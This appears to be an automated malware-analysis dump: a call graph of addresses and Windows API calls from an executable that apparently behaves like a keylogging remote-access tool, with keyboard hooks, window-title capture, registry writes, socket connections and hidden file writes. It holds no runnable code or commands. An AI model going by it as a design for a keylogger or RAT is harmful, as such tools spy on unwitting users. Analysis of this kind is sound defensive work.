48140->48144 48142 40dd6f 48816 413877 RegCreateKeyA 48142->48816 48145 4020df 11 API calls 48144->48145 48146 414f3e 48145->48146 48836 41b8b3 48146->48836 48149 4020df 11 API calls 48150 414f54 48149->48150 48151 401e65 22 API calls 48150->48151 48152 414f62 48151->48152 48153 43baac _strftime 40 API calls 48152->48153 48154 414f6f 48153->48154 48155 414f81 48154->48155 48156 414f74 Sleep 48154->48156 48157 402093 28 API calls 48155->48157 48156->48155 48158 414f90 48157->48158 48159 401e65 22 API calls 48158->48159 48160 414f99 48159->48160 48161 4020f6 28 API calls 48160->48161 48162 414fa4 48161->48162 48163 41be1b 28 API calls 48162->48163 48164 414fac 48163->48164 48840 40489e WSAStartup 48164->48840 48166 414fb6 48167 401e65 22 API calls 48166->48167 48168 414fbf 48167->48168 48169 401e65 22 API calls 48168->48169 48218 41503e 48168->48218 48170 414fd8 48169->48170 48172 401e65 22 API calls 48170->48172 48171 4020f6 28 API calls 48171->48218 48173 414fe9 48172->48173 48175 401e65 22 API calls 48173->48175 48174 41be1b 28 API calls 48174->48218 48176 414ffa 48175->48176 48178 401e65 22 API calls 48176->48178 48177 406c1e 28 API calls 48177->48218 48179 41500b 48178->48179 48180 401e65 22 API calls 48179->48180 48182 41501c 48180->48182 48181 401fe2 28 API calls 48181->48218 48184 401e65 22 API calls 48182->48184 48183 401fd8 11 API calls 48183->48218 48185 41502e 48184->48185 48975 40473d 89 API calls 48185->48975 48187 40531e 28 API calls 48187->48218 48188 406383 28 API calls 48188->48218 48189 401e65 22 API calls 48189->48218 48191 41518c WSAGetLastError 48976 41cae1 30 API calls 48191->48976 48195 402093 28 API calls 48197 41519c 48195->48197 48197->48195 48199 41b4ef 80 API calls 48197->48199 48201 401e8d 11 API calls 48197->48201 48202 401e65 22 API calls 48197->48202 48203 43baac _strftime 40 API calls 48197->48203 48197->48218 48238 415a71 CreateThread 48197->48238 48239 401fd8 11 API calls 48197->48239 48240 401f09 11 API calls 48197->48240 48977 4052fd 28 API calls 48197->48977 48979 40b051 85 API calls 48197->48979 48980 404e26 99 API calls 48197->48980 48199->48197 48201->48197 48202->48197 48204 415acf Sleep 48203->48204 48204->48197 48205 402f10 28 API calls 48205->48218 48206 402093 28 API calls 48206->48218 48207 41b4ef 80 API calls 48207->48218 48210 40905c 28 API calls 48210->48218 48211 441e81 20 API calls 48211->48218 48212 4136f8 3 API calls 48212->48218 48213 4135a6 31 API calls 48213->48218 48214 40417e 28 API calls 48214->48218 48218->48171 48218->48174 48218->48177 48218->48181 48218->48183 48218->48187 48218->48188 48218->48189 48218->48191 48218->48197 48218->48205 48218->48206 48218->48207 48218->48210 48218->48211 48218->48212 48218->48213 48218->48214 48219 41bb8e 28 API calls 48218->48219 48220 401e65 22 API calls 48218->48220 48841 414ee9 48218->48841 48846 40482d 48218->48846 48853 404f51 48218->48853 48868 4048c8 connect 48218->48868 48928 41b7e0 48218->48928 48931 4145bd 48218->48931 48934 40dd89 48218->48934 48940 41bc42 48218->48940 48943 41bd1e 48218->48943 48219->48218 48221 415439 GetTickCount 48220->48221 48222 41bb8e 28 API calls 48221->48222 48230 415456 48222->48230 48224 41bb8e 28 API calls 48224->48230 48226 41bd1e 28 API calls 48226->48230 48229 406383 28 API calls 48229->48230 48230->48224 48230->48226 48230->48229 48231 402f10 28 API calls 48230->48231 48232 402ea1 28 API calls 48230->48232 48234 401fd8 11 API calls 48230->48234 48235 401f09 11 API calls 48230->48235 48947 41bae6 48230->48947 48949 41ba96 48230->48949 48954 40f8d1 29 API calls 48230->48954 48955 402f31 28 API calls 48230->48955 48956 404c10 48230->48956 48978 404aa1 61 API calls ctype 48230->48978 48231->48230 48232->48230 48234->48230 48235->48230 48238->48197 49163 41ad17 105 API calls 48238->49163 48239->48197 48240->48197 48241->47415 48242->47422 48243->47426 48246 4020df 11 API calls 48245->48246 48247 406c2a 48246->48247 48248 4032a0 28 API calls 48247->48248 48249 406c47 48248->48249 48249->47448 48251 413573 RegQueryValueExA RegCloseKey 48250->48251 48252 40eba4 48250->48252 48251->48252 48252->47445 48252->47463 48253->47451 48254->47481 48255->47475 48256->47465 48257->47479 48259 401f86 11 API calls 48258->48259 48260 40da50 48259->48260 48261 40da70 48260->48261 48262 40daa5 48260->48262 48277 40da66 48260->48277 49164 41b5b4 29 API calls 48261->49164 48264 41bfb7 GetCurrentProcess 48262->48264 48263 40db99 GetLongPathNameW 48266 40417e 28 API calls 48263->48266 48267 40daaa 48264->48267 48269 40dbae 48266->48269 48270 40db00 48267->48270 48271 40daae 48267->48271 48268 40da79 48272 401f13 28 API calls 48268->48272 48273 40417e 28 API calls 48269->48273 48274 40417e 28 API calls 48270->48274 48275 40417e 28 API calls 48271->48275 48276 40da83 48272->48276 48278 40dbbd 48273->48278 48279 40db0e 48274->48279 48280 40dabc 48275->48280 48281 401f09 11 API calls 48276->48281 48277->48263 49167 40ddd1 28 API calls 48278->49167 48285 40417e 28 API calls 48279->48285 48286 40417e 28 API calls 48280->48286 48281->48277 48283 40dbd0 49168 402fa5 28 API calls 48283->49168 48288 40db24 48285->48288 48289 40dad2 48286->48289 48287 40dbdb 49169 402fa5 28 API calls 48287->49169 49166 402fa5 28 API calls 48288->49166 49165 402fa5 28 API calls 48289->49165 48293 40dbe5 48297 401f09 11 API calls 48293->48297 48294 40db2f 48298 401f13 28 API calls 48294->48298 48295 40dadd 48296 401f13 28 API calls 48295->48296 48300 40dae8 48296->48300 48301 40dbef 48297->48301 48299 40db3a 48298->48299 48302 401f09 11 API calls 48299->48302 48303 401f09 11 API calls 48300->48303 48304 401f09 11 API calls 48301->48304 48306 40db43 48302->48306 48307 40daf1 48303->48307 48305 40dbf8 48304->48305 48308 401f09 11 API calls 48305->48308 48309 401f09 11 API calls 48306->48309 48310 401f09 11 API calls 48307->48310 48311 40dc01 48308->48311 48309->48276 48310->48276 48312 401f09 11 API calls 48311->48312 48313 40dc0a 48312->48313 48314 401f09 11 API calls 48313->48314 48315 40dc13 48314->48315 48315->47539 48316->47551 48317->47573 48319 41371e RegQueryValueExA RegCloseKey 48318->48319 48320 413742 48318->48320 48319->48320 48320->47529 48321->47565 48326 4344ef 48322->48326 48323 43bd51 _Yarn 21 API calls 48323->48326 48324 40f0d1 48324->47604 48326->48323 48326->48324 49170 442f80 7 API calls 2 library calls 48326->49170 49171 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48326->49171 49172 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48326->49172 48329->47635 48330->47623 48332->47667 48333->47470 48336 41b4c5 LoadResource LockResource SizeofResource 48335->48336 48337 40f3de 48335->48337 48336->48337 48338 43bd51 48337->48338 48343 446137 ___crtLCMapStringA 48338->48343 48339 446175 48355 4405dd 20 API calls __dosmaperr 48339->48355 48340 446160 RtlAllocateHeap 48342 446173 48340->48342 48340->48343 48342->47923 48343->48339 48343->48340 48354 442f80 7 API calls 2 library calls 48343->48354 48346 4020bf 48345->48346 48356 4023ce 48346->48356 48348 4020ca 48360 40250a 48348->48360 48350 4020d9 48350->47926 48352 4020b7 28 API calls 48351->48352 48353 406dec 48352->48353 48353->47933 48354->48343 48355->48342 48357 4023d8 48356->48357 48358 402428 48356->48358 48357->48358 48367 4027a7 11 API calls std::_Deallocate 48357->48367 48358->48348 48361 40251a 48360->48361 48362 402520 48361->48362 48363 402535 48361->48363 48368 402569 48362->48368 48378 4028e8 48363->48378 48366 402533 48366->48350 48367->48358 48369 402888 22 API calls 48368->48369 48370 40257d 48369->48370 48371 402592 48370->48371 48372 4025a7 48370->48372 48389 402a34 22 API calls 48371->48389 48374 4028e8 28 API calls 48372->48374 48377 4025a5 48374->48377 48375 40259b 48390 4029da 22 API calls 48375->48390 48377->48366 48379 4028f1 48378->48379 48380 402953 48379->48380 48381 4028fb 48379->48381 48397 4028a4 22 API calls 48380->48397 48384 402904 48381->48384 48385 402917 48381->48385 48391 402cae 48384->48391 48387 402915 48385->48387 48388 4023ce 11 API calls 48385->48388 48387->48366 48388->48387 48389->48375 48390->48377 48392 402cb8 __EH_prolog 48391->48392 48398 402e54 22 API calls 48392->48398 48394 4023ce 11 API calls 48396 402d92 48394->48396 48395 402d24 48395->48394 48396->48387 48398->48395 48400 4020e7 48399->48400 48401 4023ce 11 API calls 48400->48401 48402 4020f2 48401->48402 48402->47955 48408 40423a 48403->48408 48406->47955 48407->47961 48409 404243 48408->48409 48410 4023ce 11 API calls 48409->48410 48411 40424e 48410->48411 48412 402569 28 API calls 48411->48412 48413 4041b5 48412->48413 48413->47955 48414->47965 48415->47970 48416->47968 48420 4032aa 48418->48420 48419 4032c9 48419->47981 48420->48419 48421 4028e8 28 API calls 48420->48421 48421->48419 48423 4051fb 48422->48423 48432 405274 48423->48432 48425 405208 48425->47984 48427 402061 48426->48427 48428 4023ce 11 API calls 48427->48428 48429 40207b 48428->48429 48454 40267a 48429->48454 48433 405282 48432->48433 48434 405288 48433->48434 48435 40529e 48433->48435 48443 4025f0 48434->48443 48437 4052f5 48435->48437 48438 4052b6 48435->48438 48452 4028a4 22 API calls 48437->48452 48441 4028e8 28 API calls 48438->48441 48442 40529c 48438->48442 48441->48442 48442->48425 48444 402888 22 API calls 48443->48444 48445 402602 48444->48445 48446 402672 48445->48446 48448 402629 48445->48448 48453 4028a4 22 API calls 48446->48453 48450 4028e8 28 API calls 48448->48450 48451 40263b 48448->48451 48450->48451 48451->48442 48455 40268b 48454->48455 48456 4023ce 11 API calls 48455->48456 48457 40208d 48456->48457 48457->47987 48458->47995 48459->48000 48462 41bfc4 GetCurrentProcess 48461->48462 48463 41b2d1 48461->48463 48462->48463 48464 4135a6 RegOpenKeyExA 48463->48464 48465 4135d4 RegQueryValueExA RegCloseKey 48464->48465 48466 4135fe 48464->48466 48465->48466 48467 402093 28 API calls 48466->48467 48468 413613 48467->48468 48468->48011 48469->48022 48471 40b90c 48470->48471 48472 402252 11 API calls 48471->48472 48473 40b917 48472->48473 48476 40b92c 48473->48476 48475 40b926 48475->48030 48477 40b966 48476->48477 48478 40b938 48476->48478 48483 4028a4 22 API calls 48477->48483 48479 4027e6 28 API calls 48478->48479 48482 40b942 48479->48482 48482->48475 48484->48033 48486 402347 48485->48486 48487 402252 11 API calls 48486->48487 48488 4023c7 48487->48488 48488->48033 48490 4024f9 48489->48490 48491 40250a 28 API calls 48490->48491 48492 4020b1 48491->48492 48492->47545 48509 43ba0a 48493->48509 48495 43ae50 48496 43a7b7 __cftoe 36 API calls 48495->48496 48501 43ae5c 48496->48501 48497 43ae15 48497->48495 48498 43ae2a 48497->48498 48508 43ae2f __wsopen_s 48497->48508 48514 4405dd 20 API calls __dosmaperr 48498->48514 48502 43ae8b 48501->48502 48515 43ba4f 40 API calls __Tolower 48501->48515 48505 43aef7 48502->48505 48516 43b9b6 20 API calls 2 library calls 48502->48516 48517 43b9b6 20 API calls 2 library calls 48505->48517 48506 43afbe _strftime 48506->48508 48518 4405dd 20 API calls __dosmaperr 48506->48518 48508->48068 48510 43ba22 48509->48510 48511 43ba0f 48509->48511 48510->48497 48519 4405dd 20 API calls __dosmaperr 48511->48519 48513 43ba14 __wsopen_s 48513->48497 48514->48508 48515->48501 48516->48505 48517->48506 48518->48508 48519->48513 48526 401fb0 48520->48526 48522 402f1e 48523 402055 11 API calls 48522->48523 48524 402f2d 48523->48524 48524->48082 48525->48085 48527 4025f0 28 API calls 48526->48527 48528 401fbd 48527->48528 48528->48522 48530 40a127 48529->48530 48531 413549 3 API calls 48530->48531 48532 40a12e 48531->48532 48533 40a142 48532->48533 48534 40a15c 48532->48534 48535 409e9b 48533->48535 48536 40a147 48533->48536 48550 40905c 48534->48550 48535->47596 48538 40905c 28 API calls 48536->48538 48540 40a155 48538->48540 48578 40a22d 29 API calls 48540->48578 48543 40a15a 48543->48535 48544->48111 48713 403222 48545->48713 48547 403022 48717 403262 48547->48717 48551 409072 48550->48551 48552 402252 11 API calls 48551->48552 48553 40908c 48552->48553 48554 404267 28 API calls 48553->48554 48555 40909a 48554->48555 48556 40a179 48555->48556 48579 40b8ec 48556->48579 48559 40a1a2 48562 402093 28 API calls 48559->48562 48560 40a1ca 48561 402093 28 API calls 48560->48561 48564 40a1d5 48561->48564 48563 40a1ac 48562->48563 48565 41bc5e 28 API calls 48563->48565 48566 402093 28 API calls 48564->48566 48567 40a1ba 48565->48567 48568 40a1e4 48566->48568 48583 40b164 31 API calls _Yarn 48567->48583 48570 41b4ef 80 API calls 48568->48570 48572 40a1e9 CreateThread 48570->48572 48571 40a1c1 48573 401fd8 11 API calls 48571->48573 48574 40a210 CreateThread 48572->48574 48575 40a204 CreateThread 48572->48575 48591 40a27d 48572->48591 48573->48560 48576 401f09 11 API calls 48574->48576 48588 40a289 48574->48588 48575->48574 48585 40a267 48575->48585 48577 40a224 48576->48577 48577->48535 48578->48543 48712 40a273 164 API calls 48578->48712 48580 40b8f5 48579->48580 48581 40a197 48579->48581 48584 40b96c 28 API calls 48580->48584 48581->48559 48581->48560 48583->48571 48584->48581 48594 40a2b8 48585->48594 48624 40acd6 48588->48624 48665 40a726 48591->48665 48595 40a2d1 GetModuleHandleA SetWindowsHookExA 48594->48595 48596 40a333 GetMessageA 48594->48596 48595->48596 48598 40a2ed GetLastError 48595->48598 48597 40a345 TranslateMessage DispatchMessageA 48596->48597 48608 40a270 48596->48608 48597->48596 48597->48608 48609 41bb8e 48598->48609 48615 441e81 48609->48615 48612 402093 28 API calls 48613 40a2fe 48612->48613 48614 4052fd 28 API calls 48613->48614 48616 441e8d 48615->48616 48619 441c7d 48616->48619 48618 41bbb2 48618->48612 48620 441c94 48619->48620 48622 441ccb __wsopen_s 48620->48622 48623 4405dd 20 API calls __dosmaperr 48620->48623 48622->48618 48623->48622 48629 40ace4 48624->48629 48625 40a292 48626 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW WSAGetQOSByName 48626->48629 48629->48625 48629->48626 48631 40ad84 GetWindowTextW 48629->48631 48634 40b8ec 28 API calls 48629->48634 48635 40aedc 48629->48635 48636 41bae6 GetTickCount 48629->48636 48638 40ae49 Sleep 48629->48638 48639 441e81 20 API calls 48629->48639 48641 402093 28 API calls 48629->48641 48642 40add1 48629->48642 48646 406383 28 API calls 48629->48646 48648 403014 28 API calls 48629->48648 48649 41bc5e 28 API calls 48629->48649 48650 401f09 11 API calls 48629->48650 48651 40a636 12 API calls 48629->48651 48652 401fd8 11 API calls 48629->48652 48653 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 48629->48653 48654 401f86 48629->48654 48658 434770 23 API calls __onexit 48629->48658 48659 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 48629->48659 48660 409044 28 API calls 48629->48660 48662 40b97c 28 API calls 48629->48662 48663 40b748 40 API calls 2 library calls 48629->48663 48664 4052fd 28 API calls 48629->48664 48631->48629 48634->48629 48637 401f09 11 API calls 48635->48637 48636->48629 48637->48625 48638->48629 48639->48629 48641->48629 48642->48629 48644 40905c 28 API calls 48642->48644 48661 40b164 31 API calls _Yarn 48642->48661 48644->48642 48646->48629 48648->48629 48649->48629 48650->48629 48651->48629 48652->48629 48655 401f8e 48654->48655 48656 402252 11 API calls 48655->48656 48657 401f99 48656->48657 48657->48629 48658->48629 48659->48629 48660->48629 48661->48642 48662->48629 48663->48629 48666 40a73b Sleep 48665->48666 48686 40a675 48666->48686 48668 40a286 48669 40a77b CreateDirectoryW 48673 40a74d 48669->48673 48670 40a78c GetFileAttributesW 48670->48673 48671 40a7a3 SetFileAttributesW 48671->48673 48673->48666 48673->48668 48673->48670 48673->48671 48675 401e65 22 API calls 48673->48675 48684 40a76f 48673->48684 48699 41c3f1 48673->48699 48674 40a81d PathFileExistsW 48674->48684 48675->48673 48676 4020df 11 API calls 48676->48684 48677 4020b7 28 API calls 48677->48684 48679 40a926 SetFileAttributesW 48679->48673 48680 406dd8 28 API calls 48680->48684 48681 401fe2 28 API calls 48681->48684 48682 401fd8 11 API calls 48682->48684 48684->48669 48684->48674 48684->48676 48684->48677 48684->48679 48684->48680 48684->48681 48684->48682 48685 401fd8 11 API calls 48684->48685 48709 41c485 32 API calls 48684->48709 48710 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48684->48710 48685->48673 48687 40a722 48686->48687 48689 40a68b 48686->48689 48687->48673 48688 40a6aa CreateFileW 48688->48689 48690 40a6b8 GetFileSize 48688->48690 48689->48688 48691 40a6ed CloseHandle 48689->48691 48692 40a6ff 48689->48692 48693 40a6e2 Sleep 48689->48693 48694 40a6db 48689->48694 48690->48689 48690->48691 48691->48689 48692->48687 48696 40905c 28 API calls 48692->48696 48693->48691 48711 40b0dc 84 API calls 48694->48711 48697 40a71b 48696->48697 48698 40a179 125 API calls 48697->48698 48698->48687 48700 41c404 CreateFileW 48699->48700 48702 41c441 48700->48702 48703 41c43d 48700->48703 48704 41c461 WriteFile 48702->48704 48705 41c448 SetFilePointer 48702->48705 48703->48673 48707 41c474 48704->48707 48708 41c476 CloseHandle 48704->48708 48705->48704 48706 41c458 CloseHandle 48705->48706 48706->48703 48707->48708 48708->48703 48709->48684 48710->48684 48711->48693 48714 40322e 48713->48714 48723 403618 48714->48723 48716 40323b 48716->48547 48718 40326e 48717->48718 48719 402252 11 API calls 48718->48719 48720 403288 48719->48720 48721 402336 11 API calls 48720->48721 48722 403031 48721->48722 48722->48115 48724 403626 48723->48724 48725 403644 48724->48725 48726 40362c 48724->48726 48728 40369e 48725->48728 48730 40365c 48725->48730 48734 4036a6 28 API calls 48726->48734 48735 4028a4 22 API calls 48728->48735 48732 4027e6 28 API calls 48730->48732 48733 403642 48730->48733 48732->48733 48733->48716 48734->48733 48741 404353 48736->48741 48738 40430a 48739 403262 11 API calls 48738->48739 48740 404319 48739->48740 48740->48124 48742 40435f 48741->48742 48745 404371 48742->48745 48744 40436d 48744->48738 48746 40437f 48745->48746 48747 404385 48746->48747 48748 40439e 48746->48748 48811 4034e6 28 API calls 48747->48811 48749 402888 22 API calls 48748->48749 48750 4043a6 48749->48750 48752 404419 48750->48752 48753 4043bf 48750->48753 48812 4028a4 22 API calls 48752->48812 48756 4027e6 28 API calls 48753->48756 48764 40439c 48753->48764 48756->48764 48764->48744 48811->48764 48819 43aa9a 48813->48819 48817 4138b9 48816->48817 48818 41388f RegSetValueExA RegCloseKey 48816->48818 48817->48140 48818->48817 48822 43aa1b 48819->48822 48821 40170d 48821->48142 48823 43aa2a 48822->48823 48824 43aa3e 48822->48824 48835 4405dd 20 API calls __dosmaperr 48823->48835 48827 43aa2f __alldvrm __wsopen_s 48824->48827 48828 448957 48824->48828 48827->48821 48829 4484ca __Toupper 5 API calls 48828->48829 48830 44897e 48829->48830 48831 448996 GetSystemTimeAsFileTime 48830->48831 48832 44898a 48830->48832 48831->48832 48833 434fcb CatchGuardHandler 5 API calls 48832->48833 48834 4489a7 48833->48834 48834->48827 48835->48827 48839 41b8f9 ctype ___scrt_fastfail 48836->48839 48837 402093 28 API calls 48838 414f49 48837->48838 48838->48149 48839->48837 48840->48166 48842 414f02 getaddrinfo WSASetLastError 48841->48842 48843 414ef8 48841->48843 48842->48218 48981 414d86 48843->48981 48847 404846 socket 48846->48847 48848 404839 48846->48848 48849 404860 CreateEventW 48847->48849 48850 404842 48847->48850 49020 40489e WSAStartup 48848->49020 48849->48218 48850->48218 48852 40483e 48852->48847 48852->48850 48854 404f65 48853->48854 48855 404fea 48853->48855 48856 404f6e 48854->48856 48857 404fc0 CreateEventA CreateThread 48854->48857 48858 404f7d GetLocalTime 48854->48858 48855->48218 48856->48857 48857->48855 49022 405150 48857->49022 48859 41bb8e 28 API calls 48858->48859 48860 404f91 48859->48860 49021 4052fd 28 API calls 48860->49021 48869 404a1b 48868->48869 48870 4048ee 48868->48870 48871 40497e 48869->48871 48872 404a21 WSAGetLastError 48869->48872 48870->48871 48873 404923 48870->48873 48875 40531e 28 API calls 48870->48875 48871->48218 48872->48871 48874 404a31 48872->48874 49026 420c60 27 API calls 48873->49026 48876 404932 48874->48876 48877 404a36 48874->48877 48880 40490f 48875->48880 48883 402093 28 API calls 48876->48883 49031 41cae1 30 API calls 48877->49031 48879 40492b 48879->48876 48882 404941 48879->48882 48884 402093 28 API calls 48880->48884 48892 404950 48882->48892 48893 404987 48882->48893 48886 404a80 48883->48886 48887 40491e 48884->48887 48885 404a40 49032 4052fd 28 API calls 48885->49032 48889 402093 28 API calls 48886->48889 48890 41b4ef 80 API calls 48887->48890 48894 404a8f 48889->48894 48890->48873 48898 402093 28 API calls 48892->48898 49028 421a40 54 API calls 48893->49028 48899 41b4ef 80 API calls 48894->48899 48902 40495f 48898->48902 48899->48871 48900 40498f 48903 4049c4 48900->48903 48904 404994 48900->48904 48906 402093 28 API calls 48902->48906 49030 420e06 28 API calls 48903->49030 48907 402093 28 API calls 48904->48907 48909 40496e 48906->48909 48911 4049a3 48907->48911 48912 41b4ef 80 API calls 48909->48912 48914 402093 28 API calls 48911->48914 48915 404973 48912->48915 48913 4049cc 48916 4049f9 CreateEventW CreateEventW 48913->48916 48918 402093 28 API calls 48913->48918 48917 4049b2 48914->48917 49027 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48915->49027 48916->48871 48920 41b4ef 80 API calls 48917->48920 48919 4049e2 48918->48919 48922 402093 28 API calls 48919->48922 48923 4049b7 48920->48923 48924 4049f1 48922->48924 49029 4210b2 52 API calls 48923->49029 48926 41b4ef 80 API calls 48924->48926 48927 4049f6 48926->48927 48927->48916 49033 41b7b6 GlobalMemoryStatusEx 48928->49033 48930 41b7f5 48930->48218 49034 414580 48931->49034 48935 40dda5 48934->48935 48936 4134ff 3 API calls 48935->48936 48937 40ddac 48936->48937 48938 40ddc4 48937->48938 48939 413549 3 API calls 48937->48939 48938->48218 48939->48938 48941 4020b7 28 API calls 48940->48941 48942 41bc57 48941->48942 48942->48218 48944 41bd2b 48943->48944 48945 4020b7 28 API calls 48944->48945 48946 41bd3d 48945->48946 48946->48218 48948 41bafc GetTickCount 48947->48948 48948->48230 48950 436e90 ___scrt_fastfail 48949->48950 48951 41bab5 GetForegroundWindow GetWindowTextW 48950->48951 48952 40417e 28 API calls 48951->48952 48953 41badf 48952->48953 48953->48230 48954->48230 48955->48230 48957 4020df 11 API calls 48956->48957 48958 404c27 48957->48958 48959 4020df 11 API calls 48958->48959 48971 404c30 48959->48971 48960 43bd51 _Yarn 21 API calls 48960->48971 48962 404c96 48964 404ca1 48962->48964 48962->48971 48963 4020b7 28 API calls 48963->48971 49076 404e26 99 API calls 48964->49076 48965 401fe2 28 API calls 48965->48971 48967 404ca8 48969 401fd8 11 API calls 48967->48969 48968 401fd8 11 API calls 48968->48971 48970 404cb1 48969->48970 48972 401fd8 11 API calls 48970->48972 48971->48960 48971->48962 48971->48963 48971->48965 48971->48968 49063 404cc3 48971->49063 49075 404b96 57 API calls 48971->49075 48973 404cba 48972->48973 48973->48197 48975->48218 48976->48197 48978->48230 48979->48197 48980->48197 48982 414dc8 GetSystemDirectoryA 48981->48982 48999 414ecf 48981->48999 48983 414de3 48982->48983 48982->48999 49002 441a3e 48983->49002 48985 414dff 49009 441a98 48985->49009 48987 414e0f LoadLibraryA 48988 414e31 GetProcAddress 48987->48988 48989 414e42 48987->48989 48988->48989 48990 414e3d FreeLibrary 48988->48990 48991 441a3e ___std_exception_copy 20 API calls 48989->48991 49000 414e93 48989->49000 48990->48989 48992 414e5e 48991->48992 48993 441a98 20 API calls 48992->48993 48995 414e6e LoadLibraryA 48993->48995 48994 414e99 GetProcAddress 48996 414eb4 FreeLibrary 48994->48996 48994->49000 48998 414e82 GetProcAddress 48995->48998 48995->48999 48997 414eb2 48996->48997 48997->48999 48998->49000 49001 414e8e FreeLibrary 48998->49001 48999->48842 49000->48994 49000->48997 49000->48999 49001->49000 49003 441a59 49002->49003 49004 441a4b 49002->49004 49016 4405dd 20 API calls __dosmaperr 49003->49016 49004->49003 49007 441a70 49004->49007 49006 441a61 __wsopen_s 49006->48985 49007->49006 49017 4405dd 20 API calls __dosmaperr 49007->49017 49010 441ab4 49009->49010 49012 441aa6 49009->49012 49018 4405dd 20 API calls __dosmaperr 49010->49018 49012->49010 49013 441add 49012->49013 49015 441abc __wsopen_s 49013->49015 49019 4405dd 20 API calls __dosmaperr 49013->49019 49015->48987 49016->49006 49017->49006 49018->49015 49019->49015 49020->48852 49025 40515c 102 API calls 49022->49025 49024 405159 49025->49024 49026->48879 49027->48871 49028->48900 49029->48915 49030->48913 49031->48885 49033->48930 49037 414553 49034->49037 49038 414568 ___scrt_initialize_default_local_stdio_options 49037->49038 49041 43f79d 49038->49041 49044 43c4f0 49041->49044 49045 43c530 49044->49045 49046 43c518 49044->49046 49045->49046 49048 43c538 49045->49048 49059 4405dd 20 API calls __dosmaperr 49046->49059 49049 43a7b7 __cftoe 36 API calls 49048->49049 49050 43c548 49049->49050 49060 43cc76 20 API calls 2 library calls 49050->49060 49051 43c51d __wsopen_s 49053 434fcb CatchGuardHandler 5 API calls 49051->49053 49055 414576 49053->49055 49054 43c5c0 49061 43d2e4 51 API calls 3 library calls 49054->49061 49055->48218 49058 43c5cb 49062 43cce0 20 API calls _free 49058->49062 49059->49051 49060->49054 49061->49058 49062->49051 49064 4020df 11 API calls 49063->49064 49073 404cde 49064->49073 49065 404e13 49066 401fd8 11 API calls 49065->49066 49067 404e1c 49066->49067 49067->48962 49068 4041a2 28 API calls 49068->49073 49069 401fe2 28 API calls 49069->49073 49070 401fc0 28 API calls 49072 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 49070->49072 49071 4020f6 28 API calls 49071->49073 49072->49073 49077 415aea 49072->49077 49073->49065 49073->49068 49073->49069 49073->49070 49073->49071 49074 401fd8 11 API calls 49073->49074 49074->49073 49075->48971 49076->48967 49078 4020f6 28 API calls 49077->49078 49079 415b0c SetEvent 49078->49079 49080 415b21 49079->49080 49081 4041a2 28 API calls 49080->49081 49082 415b3b 49081->49082 49083 4020f6 28 API calls 49082->49083 49084 415b4b 49083->49084 49085 4020f6 28 API calls 49084->49085 49086 415b5d 49085->49086 49087 41be1b 28 API calls 49086->49087 49088 415b66 49087->49088 49089 417089 49088->49089 49090 415b86 GetTickCount 49088->49090 49091 415d2f 49088->49091 49092 401e8d 11 API calls 49089->49092 49093 41bb8e 28 API calls 49090->49093 49091->49089 49154 415ce5 49091->49154 49094 417092 49092->49094 49095 415b97 49093->49095 49097 401fd8 11 API calls 49094->49097 49098 41bae6 GetTickCount 49095->49098 49099 41709e 49097->49099 49100 415ba3 49098->49100 49101 401fd8 11 API calls 49099->49101 49102 41bb8e 28 API calls 49100->49102 49103 4170aa 49101->49103 49104 415bae 49102->49104 49105 41ba96 30 API calls 49104->49105 49106 415bbc 49105->49106 49107 41bd1e 28 API calls 49106->49107 49108 415bca 49107->49108 49109 401e65 22 API calls 49108->49109 49110 415bd8 49109->49110 49156 402f31 28 API calls 49110->49156 49112 415be6 49157 402ea1 28 API calls 49112->49157 49114 415bf5 49115 402f10 28 API calls 49114->49115 49116 415c04 49115->49116 49158 402ea1 28 API calls 49116->49158 49118 415c13 49119 402f10 28 API calls 49118->49119 49120 415c1f 49119->49120 49159 402ea1 28 API calls 49120->49159 49122 415c29 49160 404aa1 61 API calls ctype 49122->49160 49124 415c38 49125 401fd8 11 API calls 49124->49125 49126 415c41 49125->49126 49127 401fd8 11 API calls 49126->49127 49128 415c4d 49127->49128 49129 401fd8 11 API calls 49128->49129 49130 415c59 49129->49130 49131 401fd8 11 API calls 49130->49131 49132 415c65 49131->49132 49133 401fd8 11 API calls 49132->49133 49134 415c71 49133->49134 49135 401fd8 11 API calls 49134->49135 49136 415c7d 49135->49136 49137 401f09 11 API calls 49136->49137 49138 415c86 49137->49138 49139 401fd8 11 API calls 49138->49139 49140 415c8f 49139->49140 49141 401fd8 11 API calls 49140->49141 49142 415c98 49141->49142 49143 401e65 22 API calls 49142->49143 49144 415ca3 49143->49144 49145 43baac _strftime 40 API calls 49144->49145 49146 415cb0 49145->49146 49147 415cb5 49146->49147 49148 415cdb 49146->49148 49150 415cc3 49147->49150 49151 415cce 49147->49151 49149 401e65 22 API calls 49148->49149 49149->49154 49161 404ff4 82 API calls 49150->49161 49153 404f51 105 API calls 49151->49153 49155 415cc9 49153->49155 49154->49089 49162 4050e4 84 API calls 49154->49162 49155->49089 49156->49112 49157->49114 49158->49118 49159->49122 49160->49124 49161->49155 49162->49155 49164->48268 49165->48295 49166->48294 49167->48283 49168->48287 49169->48293 49170->48326 49175 40f7c2 49173->49175 49174 413549 3 API calls 49174->49175 49175->49174 49176 40f866 49175->49176 49178 40f856 Sleep 49175->49178 49195 40f7f4 49175->49195 49179 40905c 28 API calls 49176->49179 49177 40905c 28 API calls 49177->49195 49178->49175 49180 40f871 49179->49180 49183 41bc5e 28 API calls 49180->49183 49182 41bc5e 28 API calls 49182->49195 49184 40f87d 49183->49184 49208 413814 14 API calls 49184->49208 49187 401f09 11 API calls 49187->49195 49188 40f890 49189 401f09 11 API calls 49188->49189 49191 40f89c 49189->49191 49190 402093 28 API calls 49190->49195 49192 402093 28 API calls 49191->49192 49193 40f8ad 49192->49193 49196 41376f 14 API calls 49193->49196 49194 41376f 14 API calls 49194->49195 49195->49177 49195->49178 49195->49182 49195->49187 49195->49190 49195->49194 49206 40d096 112 API calls ___scrt_fastfail 49195->49206 49207 413814 14 API calls 49195->49207 49197 40f8c0 49196->49197 49209 412850 TerminateProcess WaitForSingleObject 49197->49209 49199 40f8c8 ExitProcess 49210 4127ee 62 API calls 49203->49210 49207->49195 49208->49188 49209->49199 49211 4269e6 49212 4269fb 49211->49212 49223 426a8d 